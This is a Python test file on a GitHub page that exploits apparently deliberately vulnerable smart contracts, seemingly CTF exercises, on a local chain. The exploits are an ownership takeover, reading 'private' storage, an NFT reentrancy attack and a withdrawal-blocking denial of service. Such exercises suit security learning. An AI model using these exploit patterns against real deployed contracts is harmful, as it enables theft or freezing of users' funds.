-
Notifications
You must be signed in to change notification settings - Fork 0
/
test_hack_script.py
150 lines (109 loc) · 4.64 KB
/
test_hack_script.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
from brownie import Contract, network, accounts, RoadClosed, Confidential, safeNFT, VIP_Bank, nft_hack, web3, reverts
import pytest
DECIMALS = 10**18
def test_hack_road():
# Contract owner
owner = accounts[0]
# hack3r
hack3r = accounts[1]
# Deploy the contract
instance = RoadClosed.deploy({'from': owner})
# bypasse method with elevated privileges
instance.addToWhitelist(hack3r, {'from': hack3r})
# change the owner after whitelisting
instance.changeOwner(hack3r, {'from': hack3r})
# perform the hack
instance.pwn(hack3r, {'from': hack3r})
# print hacked value
assert instance.isHacked()
def test_hack_confidential():
# Contract owner
owner = accounts[0]
# hack3r
hack3r = accounts[1]
# Deploy the contract
instance = Confidential.deploy({'from': owner})
# Connect to the Ethereum network
web3.connect('http://localhost:8545')
# Get the storage at the specified address
storage_value_0 = web3.eth.get_storage_at(instance.address, 0, "latest")
storage_value_1 = web3.eth.get_storage_at(instance.address, 1, "latest")
storage_value_2 = web3.eth.get_storage_at(instance.address, 2, "latest")
storage_value_3 = web3.eth.get_storage_at(instance.address, 3, "latest")
storage_value_4 = web3.eth.get_storage_at(instance.address, 4, "latest")
storage_value_5 = web3.eth.get_storage_at(instance.address, 5, "latest")
storage_value_6 = web3.eth.get_storage_at(instance.address, 6, "latest")
storage_value_7 = web3.eth.get_storage_at(instance.address, 7, "latest")
storage_value_8 = web3.eth.get_storage_at(instance.address, 8, "latest")
# The returned value is a bytes object, which you can decode to a hex string
zero = storage_value_0.hex()
two = storage_value_2.hex()
three = storage_value_3.hex()
five = storage_value_5.hex()
seven = storage_value_6.hex()
eight = storage_value_8.hex()
alice = bytes.decode(bytes.fromhex(zero[2:]), "UTF-8").replace("\x00", "").replace("\n", "")
alice_private_key = bytes.decode(bytes.fromhex(two[2:]), "UTF-8").replace("\x00", "").replace("\n", "")
alice_data = bytes.decode(bytes.fromhex(three[2:]), "UTF-8").replace("\x00", "").replace("\n", "")
bob = bytes.decode(bytes.fromhex(five[2:]), "UTF-8").replace("\x00", "").replace("\x06", "").replace("\n", "")
bob_private_key = bytes.decode(bytes.fromhex(seven[2:]), "UTF-8").replace("\x00", "").replace("\x15", "").replace("\n", "")
bob_data = bytes.decode(bytes.fromhex(eight[2:]), "UTF-8").replace("\x00", "").replace("\n", "")
# prints Alice
assert alice == "ALICE"
# prints Alice Secret Key
print(alice_private_key)
assert "" == alice_private_key
# prints alice data
print(alice_data)
assert alice_data == "QWxpY2UK"
# prints Bob
print(bob)
assert bob == "BOB"
# prints bob Secret Key
print(bob_private_key)
assert "" == bob_private_key
# prints bob data
print(bob_data)
assert bob_data == "Qm9iCg"
def test_hack_safeNFT_test():
# Contract owner
owner = accounts[0]
# hack3r
hack3r = accounts[1]
# Deploy the contract
nft_price = 0.01 * DECIMALS
instance = safeNFT.deploy("ToBeHacked NFT", "TBH", nft_price, {'from': owner})
print(f'Deployed safeNFT address: {instance.address}')
nft_hack_instance = nft_hack.deploy(instance.address, {'from': hack3r})
print(f'Deployed safeNFT address: {nft_hack_instance.address}')
# Buy an NFT
nft_hack_instance.buy({"from": hack3r, "value": nft_price})
# Claim NFT while trigger the reentrancy hack
nft_hack_instance.claim({"from": hack3r})
hacker_sm_balance = instance.balanceOf(nft_hack_instance.address)
print("Smart Contract balance in NFT Tokens")
print(hacker_sm_balance)
assert hacker_sm_balance > 0
def test_vip_bank_hack_test():
# Contract owner
owner = accounts[0]
# hack3r
hack3r = accounts[1]
# Alice
alice = accounts[2]
# Deploy the contract
nft_price = 0.01 * 10**18
print(nft_price)
instance = VIP_Bank.deploy({'from': owner})
# Add the alice and hacker as VIP to be use the bank.
instance.addVIP(alice.address, {'from': owner})
instance.addVIP(hack3r.address, {'from': owner})
# users deposit in the bank
deposit_amount = 0.05*DECIMALS
for i in range(10):
instance.deposit({'from': alice, "value": deposit_amount})
# Hacker deposits 1 wei and blocks withdraws
instance.deposit({'from': hack3r, "value": 1})
# Alice tries to withdraw her funds but fails
with reverts("Cannot withdraw more than 0.5 ETH per transaction"):
instance.withdraw(1, {'from': alice})